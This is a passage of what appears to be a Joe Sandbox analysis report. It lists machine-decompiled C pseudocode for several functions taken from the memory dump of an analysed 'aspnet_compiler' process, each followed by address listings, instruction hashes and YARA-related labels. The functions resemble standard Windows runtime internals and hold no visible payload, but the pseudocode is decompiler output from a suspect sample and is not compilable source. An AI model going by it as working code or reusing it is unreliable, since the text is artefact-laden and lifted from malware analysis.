				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E011ED0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1287b10 =  *0x1287b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x128536c; // 0x77e15368
					if( *_t51 != 0x1285368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1285368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x128536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E011CA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                        0x011ca61c
                                                                                        0x011ca61e
                                                                                        0x011ca623
                                                                                        0x011ca628
                                                                                        0x011ca62b
                                                                                        0x011ca62d
                                                                                        0x011ca648
                                                                                        0x011ca64a
                                                                                        0x011ca64f
                                                                                        0x01209b44
                                                                                        0x011ca6ec
                                                                                        0x011ca6f1
                                                                                        0x011ca6f1
                                                                                        0x011ca655
                                                                                        0x011ca657
                                                                                        0x011ca65a
                                                                                        0x011ca65d
                                                                                        0x011ca662
                                                                                        0x011ca663
                                                                                        0x011ca667
                                                                                        0x011ca668
                                                                                        0x011ca66d
                                                                                        0x011ca706
                                                                                        0x011ca706
                                                                                        0x01209bda
                                                                                        0x01209be6
                                                                                        0x01209beb
                                                                                        0x00000000
                                                                                        0x01209beb
                                                                                        0x011ca679
                                                                                        0x01209b7a
                                                                                        0x00000000
                                                                                        0x01209b7a
                                                                                        0x011ca683
                                                                                        0x011ca6f4
                                                                                        0x011ca6f7
                                                                                        0x011ca6f9
                                                                                        0x011ca6fd
                                                                                        0x011ca6a0
                                                                                        0x011ca6a0
                                                                                        0x011ca6ad
                                                                                        0x011ca6af
                                                                                        0x011ca6b4
                                                                                        0x01209ba7
                                                                                        0x01209bac
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01209bc6
                                                                                        0x01209bce
                                                                                        0x01209bd1
                                                                                        0x01209bd3
                                                                                        0x01209bd3
                                                                                        0x00000000
                                                                                        0x01209bd1
                                                                                        0x011ca6bd
                                                                                        0x011ca6c3
                                                                                        0x011ca6c6
                                                                                        0x011ca6d2
                                                                                        0x011ca701
                                                                                        0x011ca704
                                                                                        0x00000000
                                                                                        0x011ca704
                                                                                        0x011ca6d4
                                                                                        0x011ca6d6
                                                                                        0x011ca6d9
                                                                                        0x011ca6db
                                                                                        0x011ca6e1
                                                                                        0x011ca6e6
                                                                                        0x011ca6e8
                                                                                        0x011ca6e8
                                                                                        0x011ca6ea
                                                                                        0x00000000
                                                                                        0x011ca6ea
                                                                                        0x011ca688
                                                                                        0x011ca692
                                                                                        0x011ca694
                                                                                        0x011ca699
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ca69d
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: abab785036abee166ce4029759b20cb3805bc5dffc6f42c23d3962a2cadc6fd2
                                                                                        • Instruction ID: e02b8ee08bf9056df508fc95a2e4961b73bc7ca4c8fa8ccb03a9681a60fa57a3
                                                                                        • Opcode Fuzzy Hash: abab785036abee166ce4029759b20cb3805bc5dffc6f42c23d3962a2cadc6fd2
                                                                                        • Instruction Fuzzy Hash: 6141DC74A01209DFCF0ACF58D880B9DBBF1BF58714F14806DE905AB381E374A840CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011BC182 Relevance: .1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 68%
                                                                                        			E011BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E011B7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01268D34(_v8, _t80);
					}
					E011B2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E011AFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01268833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E011AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E011DB180();
						if(_a4 != 0) {
							E011B2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E011BBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E011BBB2D(_t16, _t15);
						E011BB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E011AFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E011AFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E011AFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                        0x011bc18d
                                                                                        0x011bc18f
                                                                                        0x011bc191
                                                                                        0x011bc19b
                                                                                        0x011bc1a0
                                                                                        0x011bc1d4
                                                                                        0x011bc1de
                                                                                        0x01202d6e
                                                                                        0x011bc1e4
                                                                                        0x011bc1e4
                                                                                        0x011bc1e4
                                                                                        0x011bc1ec
                                                                                        0x01202d7d
                                                                                        0x01202d7d
                                                                                        0x011bc1f3
                                                                                        0x011bc1ff
                                                                                        0x01202d88
                                                                                        0x01202d8d
                                                                                        0x01202d94
                                                                                        0x01202d94
                                                                                        0x01202d9f
                                                                                        0x01202da4
                                                                                        0x01202dab
                                                                                        0x01202db0
                                                                                        0x01202db2
                                                                                        0x01202db3
                                                                                        0x01202db4
                                                                                        0x01202dbc
                                                                                        0x01202dc3
                                                                                        0x01202dc3
                                                                                        0x011bc205
                                                                                        0x011bc205
                                                                                        0x011bc208
                                                                                        0x011bc20e
                                                                                        0x011bc211
                                                                                        0x011bc216
                                                                                        0x011bc219
                                                                                        0x011bc21f
                                                                                        0x011bc222
                                                                                        0x011bc22c
                                                                                        0x011bc234
                                                                                        0x011bc23a
                                                                                        0x011bc23f
                                                                                        0x011bc245
                                                                                        0x011bc24b
                                                                                        0x011bc251
                                                                                        0x011bc25a
                                                                                        0x011bc276
                                                                                        0x011bc27d
                                                                                        0x011bc27d
                                                                                        0x011bc25c
                                                                                        0x011bc25c
                                                                                        0x00000000
                                                                                        0x011bc25e
                                                                                        0x011bc1a4
                                                                                        0x011bc1aa
                                                                                        0x011bc1b3
                                                                                        0x011bc265
                                                                                        0x011bc26c
                                                                                        0x011bc26c
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                        • Instruction ID: 18f9fd66247922d21d5eb6297471d99b43bb42a1330e327ee5fc16b672e6a2a9
                                                                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                        • Instruction Fuzzy Hash: 2531077260554BFED70DEBB4C4C0BE9FB58BF62208F04815AD51C97241DB386A4ACBE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01217016 Relevance: .1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 76%
                                                                                        			E01217016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x128d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01216B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01216B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E011B7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E011D9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E011DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L011B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                        0x01217016
                                                                                        0x0121701e
                                                                                        0x0121702b
                                                                                        0x01217033
                                                                                        0x01217037
                                                                                        0x0121703c
                                                                                        0x0121703e
                                                                                        0x01217041
                                                                                        0x01217045
                                                                                        0x0121704a
                                                                                        0x01217050
                                                                                        0x01217055
                                                                                        0x0121705a
                                                                                        0x01217062
                                                                                        0x01217062
                                                                                        0x0121705a
                                                                                        0x01217064
                                                                                        0x01217064
                                                                                        0x01217067
                                                                                        0x01217071
                                                                                        0x01217096
                                                                                        0x0121709b
                                                                                        0x012170a2
                                                                                        0x012170a6
                                                                                        0x012170a7
                                                                                        0x012170ad
                                                                                        0x012170b3
                                                                                        0x012170b6
                                                                                        0x012170bb
                                                                                        0x012170c3
                                                                                        0x012170c3
                                                                                        0x012170c6
                                                                                        0x012170cd
                                                                                        0x012170dd
                                                                                        0x012170e0
                                                                                        0x012170e2
                                                                                        0x012170e2
                                                                                        0x012170ee
                                                                                        0x01217101
                                                                                        0x012170f0
                                                                                        0x012170f9
                                                                                        0x012170f9
                                                                                        0x0121710a
                                                                                        0x0121710e
                                                                                        0x01217112
                                                                                        0x01217117
                                                                                        0x01217118
                                                                                        0x01217118
                                                                                        0x012170bb
                                                                                        0x0121711d
                                                                                        0x01217123
                                                                                        0x01217131
                                                                                        0x01217131
                                                                                        0x01217136
                                                                                        0x0121713d
                                                                                        0x0121713e
                                                                                        0x0121713f
                                                                                        0x0121714a
                                                                                        0x0121714a
                                                                                        0x01217084
                                                                                        0x01217088
                                                                                        0x00000000
                                                                                        0x0121708e
                                                                                        0x0121708e
                                                                                        0x01217092
                                                                                        0x00000000
                                                                                        0x01217092

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3bc653a0128e0ae6393967dad5fb98a9262a8d3479084e3202e50722b84e2de
                                                                                        • Instruction ID: 9fba1b43d527d8a932c6affb677fbea7f77848a66639d26bce4d99b45e814b81
                                                                                        • Opcode Fuzzy Hash: e3bc653a0128e0ae6393967dad5fb98a9262a8d3479084e3202e50722b84e2de
                                                                                        • Instruction Fuzzy Hash: 6731C4726147529BC324DF28C840A6BB7E5BFD8700F044A29FA9597694E730E904C7A6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CA70E Relevance: .1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 92%
                                                                                        			E011CA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1287b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1287b10 = 8;
					 *0x1287b14 = 0x1287b0c;
					 *0x1287b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E011CA990(0x1287b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L011CA840(__edx, __ecx, __ecx, _t52, 0x1287b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1287b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1287b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1287b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L011B4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1287b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E011DF3E0(_t50,  *0x1287b14, _t8 >> 3);
						_t28 =  *0x1287b14; // 0x0
						__eflags = _t28 - 0x1287b0c;
						if(_t28 != 0x1287b0c) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1287b14 = _t50;
						_t48 = _v12;
						 *0x1287b10 = _t9;
						goto L6;
					}
					 *0x1287b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                        0x011ca713
                                                                                        0x011ca714
                                                                                        0x011ca717
                                                                                        0x011ca71d
                                                                                        0x011ca720
                                                                                        0x011ca722
                                                                                        0x011ca727
                                                                                        0x011ca74a
                                                                                        0x011ca754
                                                                                        0x011ca75e
                                                                                        0x011ca768
                                                                                        0x011ca76a
                                                                                        0x011ca773
                                                                                        0x011ca78b
                                                                                        0x011ca790
                                                                                        0x011ca792
                                                                                        0x011ca741
                                                                                        0x011ca741
                                                                                        0x011ca743
                                                                                        0x011ca749
                                                                                        0x011ca749
                                                                                        0x011ca732
                                                                                        0x011ca73a
                                                                                        0x011ca797
                                                                                        0x011ca79d
                                                                                        0x011ca7a3
                                                                                        0x011ca7a9
                                                                                        0x011ca7b6
                                                                                        0x011ca7bc
                                                                                        0x011ca7ca
                                                                                        0x011ca7e0
                                                                                        0x011ca7e2
                                                                                        0x011ca7e4
                                                                                        0x01209bf2
                                                                                        0x00000000
                                                                                        0x01209bf2
                                                                                        0x011ca7ed
                                                                                        0x011ca7f2
                                                                                        0x011ca800
                                                                                        0x011ca805
                                                                                        0x011ca80d
                                                                                        0x011ca812
                                                                                        0x01209c08
                                                                                        0x01209c08
                                                                                        0x011ca818
                                                                                        0x011ca81b
                                                                                        0x011ca821
                                                                                        0x011ca824
                                                                                        0x00000000
                                                                                        0x011ca824
                                                                                        0x011ca7ae
                                                                                        0x00000000
                                                                                        0x011ca7ae
                                                                                        0x011ca73c
                                                                                        0x011ca73e
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 548153edc02f7d5b0b9a9cf329060dee55a75ca9d62a96c1db16f1be5d4355da
                                                                                        • Instruction ID: ea02298f36028cb26ccf268f654910978c703e5f22e8da31f3900ba575fb6eea
                                                                                        • Opcode Fuzzy Hash: 548153edc02f7d5b0b9a9cf329060dee55a75ca9d62a96c1db16f1be5d4355da
                                                                                        • Instruction Fuzzy Hash: C731E4B1611609DFC72ACF18F884F597BFAFB94B10F25095DE21687284F7719901CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C61A0 Relevance: .1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 97%
                                                                                        			E011C61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E011C5E50(0x11767cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01269D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0119F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                        0x011c61b3
                                                                                        0x011c61b5
                                                                                        0x011c61bd
                                                                                        0x011c61c3
                                                                                        0x011c61c7
                                                                                        0x011c61d2
                                                                                        0x011c61ff
                                                                                        0x011c61ff
                                                                                        0x011c6201
                                                                                        0x011c6207
                                                                                        0x011c6207
                                                                                        0x011c61d4
                                                                                        0x011c61d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c61df
                                                                                        0x011c61e2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c61e6
                                                                                        0x011c61e8
                                                                                        0x011c61ee
                                                                                        0x011c61ee
                                                                                        0x011c61f9
                                                                                        0x0120762f
                                                                                        0x01207632
                                                                                        0x01207635
                                                                                        0x01207639
                                                                                        0x01207640
                                                                                        0x0120766e
                                                                                        0x01207675
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01207681
                                                                                        0x01207689
                                                                                        0x0120768d
                                                                                        0x01207691
                                                                                        0x01207695
                                                                                        0x01207699
                                                                                        0x012076af
                                                                                        0x012076b5
                                                                                        0x012076b7
                                                                                        0x012076b7
                                                                                        0x012076d7
                                                                                        0x012076dc
                                                                                        0x00000000
                                                                                        0x012076dc
                                                                                        0x012076a2
                                                                                        0x012076a9
                                                                                        0x01207651
                                                                                        0x01207653
                                                                                        0x01207653
                                                                                        0x01207656
                                                                                        0x01207656
                                                                                        0x00000000
                                                                                        0x01207656
                                                                                        0x01207644
                                                                                        0x01207646
                                                                                        0x01207648
                                                                                        0x01207648
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 181d3ec3c0a6a3d745f6762ca76fba6dc7940463340f920fe02399d42774da73
                                                                                        • Instruction ID: 25869cb3d46f24b3c5d3158aa9c8ee40f2644bb312d9deddd08aacf8922fdc32
                                                                                        • Opcode Fuzzy Hash: 181d3ec3c0a6a3d745f6762ca76fba6dc7940463340f920fe02399d42774da73
                                                                                        • Instruction Fuzzy Hash: 5F3182716157018FE365CF1DC840B2ABBE5FB98B00F05496DEA9597392D770E844CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119AA16 Relevance: .1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 95%
                                                                                        			E0119AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x128d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1287b9c; // 0x0
					_t53 = L011B4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E011DB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E011DF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L011A6C59(_t53, _t51, _t58) != 0) {
							_t28 = E011C5E50(0x117c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E011CB230(_v32, _v28, 0x117c2d8, 1,  &_v24);
								_t28 = E0119F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                        0x0119aa25
                                                                                        0x0119aa29
                                                                                        0x0119aa2d
                                                                                        0x0119aa30
                                                                                        0x0119aa37
                                                                                        0x0119aa3c
                                                                                        0x011f4458
                                                                                        0x011f4458
                                                                                        0x011f4472
                                                                                        0x011f4474
                                                                                        0x011f4476
                                                                                        0x0119aa64
                                                                                        0x0119aa74
                                                                                        0x011f447c
                                                                                        0x011f4483
                                                                                        0x011f4492
                                                                                        0x0119aa52
                                                                                        0x0119aa54
                                                                                        0x0119aa5e
                                                                                        0x011f44a8
                                                                                        0x011f44ad
                                                                                        0x011f44af
                                                                                        0x011f44b6
                                                                                        0x011f44b6
